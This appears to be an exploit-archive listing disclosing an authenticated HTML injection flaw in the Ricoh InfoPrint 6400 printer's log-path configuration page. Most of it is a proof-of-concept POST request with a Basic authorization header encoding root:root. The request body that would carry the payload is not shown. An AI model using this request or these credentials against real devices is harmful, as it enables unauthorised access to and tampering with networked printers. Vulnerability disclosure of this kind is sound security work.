Ibm ricoh 6400 printer html injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-01-14 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Ibm ricoh 6400 printer html injection is for educational purposes only and if it is used you will do on your own risk!
# Description :
# Ricoh InfoPrint 6400 devices allow /config?logpathConf.html
# HTML Injection by authenticated users, as demonstrated by the 420 parameter.
HTTP Request :
POST /config?logpathConf.html HTTP/1.1
Host: SERVER
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: SERVER
Authorization: Basic cm9vdDpyb290
Connection: close
Referer: http://SERVER/config?logpathConf.html
Upgrade-Insecure-Requests: 1